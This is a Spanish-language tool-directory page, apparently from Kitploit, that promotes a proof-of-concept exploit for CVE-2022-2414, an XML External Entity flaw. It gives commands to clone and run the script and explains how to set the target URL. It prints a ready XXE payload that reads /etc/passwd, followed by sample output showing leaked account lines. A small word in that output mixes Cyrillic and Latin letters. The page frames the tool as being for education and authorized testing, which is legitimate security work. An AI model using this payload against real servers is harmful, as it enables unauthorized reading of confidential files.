Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-2414 — es un script PoC para demostrar la explotación de una vulnerabilidad de Entidad Externa XML (XXE) | Kitploit
Herramientas/GitHubGitHub/geniuszly/cve-2022-2414
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

es un script PoC para demostrar la explotación de una vulnerabilidad de Entidad Externa XML (XXE)

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

EN

GenXMLExternalEntityExploit es un script PoC para demostrar la explotación de una vulnerabilidad de Inclusión de Entidades Externas XML (XXE). El script aprovecha cargas útiles XML para leer archivos confidenciales de un servidor objetivo. Puede ser útil para pruebas de seguridad, pruebas de penetración o fines educativos.

Características

  • Envía una carga útil XML diseñada a un servidor especificado.
  • Explota vulnerabilidades XXE para leer archivos del servidor.
  • URL objetivo y datos de la carga útil fácilmente personalizables.

Cómo usar

  1. Clonar el repositorio
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. Navegar al directorio
    root@kitploit:~
    cd CVE-2022-2414
    
  3. Ejecutar el script Asegúrate de tener Python instalado en tu máquina.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

Configuración

  • TARGET_URL: Actualiza la variable TARGET_URL en el script para que apunte al servidor objetivo que deseas probar.
  • XML_PAYLOAD: Personaliza la cadena XML_PAYLOAD en el script para rutas de archivos específicas u operaciones del lado del servidor.
  • HEADERS: Modifica los encabezados HTTP según sea necesario.

Ejemplo

Por defecto, el script utiliza la siguiente carga útil para leer el archivo /etc/passwd:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

Salida de ejemplo

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas. El autor no se hace responsable de ningún uso ilegal de esta herramienta.

Descargar herramienta